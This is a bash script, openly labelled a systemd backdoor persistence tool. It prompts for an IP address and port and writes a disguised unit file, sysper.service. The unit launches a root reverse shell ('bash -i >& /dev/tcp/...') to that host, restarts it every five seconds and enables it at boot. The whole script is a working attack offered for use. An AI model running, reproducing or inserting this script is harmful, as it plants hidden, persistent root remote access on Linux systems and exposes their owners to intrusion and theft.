#!/usr/bin/bash

RED_="\x1b[31m"
GREEN_="\x1b[32m"
FIM_="\x1b[0m"

(( "$EUID" != 0 ))&& echo -e "${RED_}-${FIM_} Program must be executed as ${GREEN_}root${FIM_} (su - OR sudo ${0##*/})\n" && exit 1

echo -e "\n\t${GREEN_}-:: Systemd Daemon Backdoor Persistence ::-${FIM_}\n"

read -rp "$(echo -e $RED_" IPv4 : "$FIM_)" IPv4_
read -rp "$(echo -e $RED_" Port : "$FIM_)" PORT_

echo -e "+ ${GREEN_}Added persistence to:${FIM_} /etc/systemd/system/sysper.service\n"
echo -e '[Unit]\nDescription=System Daemon Persistence\n\n[Service]\nUser=root\nGroup=root\nWorkingDirectory=/root\nExecStart=/bin/bash -c "bash -i >& /dev/tcp/'$IPv4_/$PORT_' 0>&1"\nRestart=always\nRestartSec=5\n\n[Install]\nWantedBy=multi-user.target' >> /etc/systemd/system/sysper.service

echo -e "+ ${GREEN_}Starting the process...${FIM_}\n"
systemctl enable sysper.service && systemctl start sysper /

echo -e "+ ${GREEN_}Completed\nExiting...${FIM_}"
